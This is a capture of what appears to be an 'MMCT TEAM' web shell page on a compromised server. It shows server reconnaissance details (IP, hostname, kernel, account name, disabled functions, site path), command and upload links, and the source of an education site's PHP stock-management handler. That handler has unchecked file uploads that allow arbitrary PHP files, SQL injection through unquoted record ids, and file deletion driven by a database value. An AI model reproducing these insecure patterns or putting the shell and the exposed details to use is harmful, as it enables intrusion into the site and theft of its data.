MMCT TEAM

Server IP : 103.191.208.50 / Your IP : 216.73.216.53
Web Server : LiteSpeed
System : Linux orion.herosite.pro 4.18.0-553.53.1.lve.el8.x86_64 #1 SMP Wed May 28 17:01:02 UTC 2025 x86_64
User : celkcksm ( 1031)
PHP Version : 7.4.33
Disable Function : show_source, system, shell_exec, passthru, popen, exec
MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON
Directory (0750) : /home/celkcksm/websites/bengaledu.e-campus.co.in/
[ Home ]	[ C0mmand ]	[ Upload File ]
Current File : /home/celkcksm/websites/bengaledu.e-campus.co.in/action3.php
<?php 
ob_start();
session_start();
include_once('include/config.inc.php');

include_once('include/function.php');

switch($_REQUEST['do']) {


						case "stockcategrory" :
                    $user_id = mysqli_escape_string($con,$_REQUEST['UserID']);
					$doid = mysqli_escape_string($con,$_REQUEST['doid']);
					$name = mysqli_escape_string($con,$_REQUEST['name']);
					$description = mysqli_escape_string($con,$_REQUEST['description']);
					
                    if(!empty($doid) ){		

				    $check=mysqli_query($con,"Update stockcategry set name='".$name."',
				    description='".$description."'
                    where id='".$doid."'");
			
				
					if($check){
									$_SESSION['msg']=' Record Updated Successfully .';
								}else{
									$_SESSION['msg']='Record Not Updated ! ';
								}
					}else{
							$check=mysqli_query($con,"insert into stockcategry(user_id,name,description)
					values('".$user_id."','".$name."','".$description."')");
					if($check){
										$_SESSION['msg']=' Add Record Successfully .';
								}else{
									$_SESSION['msg']='Add Record Failed! ';
								}
					}
				
					 header("Location:stockcategory.php");
						break;	
						
						
							case "stockhead" :
                    $user_id = mysqli_escape_string($con,$_REQUEST['UserID']);
					$doid = mysqli_escape_string($con,$_REQUEST['doid']);
					$name = mysqli_escape_string($con,$_REQUEST['name']);
					$category = mysqli_escape_string($con,$_REQUEST['category']);
					$description = mysqli_escape_string($con,$_REQUEST['description']);
				
                    if(!empty($doid) ){		

				    $check=mysqli_query($con,"Update stockhead set name='".$name."',
				    description='".$description."',category='".$category."'
                    where id='".$doid."'");
			
				
					if($check){
									$_SESSION['msg']=' Record Updated Successfully .';
								}else{
									$_SESSION['msg']='Record Not Updated ! ';
								}
					}else{
							$check=mysqli_query($con,"insert into stockhead(user_id,name,category,description)
					values('".$user_id."','".$name."','".$category."','".$description."')");
					if($check){
										$_SESSION['msg']=' Add Record Successfully .';
								}else{
									$_SESSION['msg']='Add Record Failed! ';
								}
					}
				
					 header("Location:stockheadentry.php");
						break;	
						
						
            case "stockadd" :
                    $user_id = mysqli_escape_string($con,$_REQUEST['UserID']);
					$doid = mysqli_escape_string($con,$_REQUEST['doid']);
					$name = mysqli_escape_string($con,$_REQUEST['name']);
					$category = mysqli_escape_string($con,$_REQUEST['category']);
					$subcategory = mysqli_escape_string($con,$_REQUEST['stockhead']);
					$price = mysqli_escape_string($con,$_REQUEST['price']);
					$description = mysqli_escape_string($con,$_REQUEST['description']);
				    $amount = mysqli_escape_string($con,$_REQUEST['amount']);
				    $quantity = mysqli_escape_string($con,$_REQUEST['quantity']);
				    $purchase_date = mysqli_escape_string($con,$_REQUEST['purchase_date']);
				    $bill = mysqli_escape_string($con,$_REQUEST['bill']);
				    
                    if(!empty($doid) ){		

				    $check=mysqli_query($con,"Update stockadd set name='".$name."',
				    description='".$description."',category='".$category."',subcategory='".$subcategory."',
				    price='".$price."', amount='".$amount."', quantity='".$quantity."', purchase_date='".$purchase_date."'
                    where id='".$doid."'");
			            $bill="";
					    if($_FILES['bill']['name']!= NULL){
					        $old=mysqli_fetch_array(mysqli_query($con,"select bill from stockadd where id=".$doid))['bill'];
					        unlink("images/StudentEnquiry/".$old["bill"]);
                    		$bill = time().'_'.$_FILES['bill']['name'];
                    		move_uploaded_file($_FILES['bill']['tmp_name'],"images/StudentEnquiry/".$bill);
                    		$check=mysqli_query($con,"update stockadd set bill='".$bill."' where id=".$doid);
                		} 
				
					    if($check){
							$_SESSION['msg']=' Record Updated Successfully .';
						}else{
							$_SESSION['msg']='Record Not Updated ! ';
						}
					}else{
							$check=mysqli_query($con,"insert into stockadd(user_id,name,category,subcategory,price,amount,quantity,description,purchase_date)
					values('".$user_id."','".$name."','".$category."','".$subcategory."','".$price."','".$amount."','".$quantity."','".$description."','".$purchase_date."')");
					    $last_id=$con->insert_id;
					    $bill="";
					    if($_FILES['bill']['name']!= NULL){
                    		$bill = time().'_'.$_FILES['bill']['name'];
                    		move_uploaded_file($_FILES['bill']['tmp_name'],"images/StudentEnquiry/".$bill);
                    		$check=mysqli_query($con,"update stockadd set bill='".$bill."' where id=".$last_id);
                		} 
					    if($check){
							$_SESSION['msg']=' Add Record Successfully .';
						}else{
							$_SESSION['msg']='Add Record Failed! ';
						}
					}
				
					 header("Location:stockadd.php");
						break;	
						
						

}
MMCT - 2023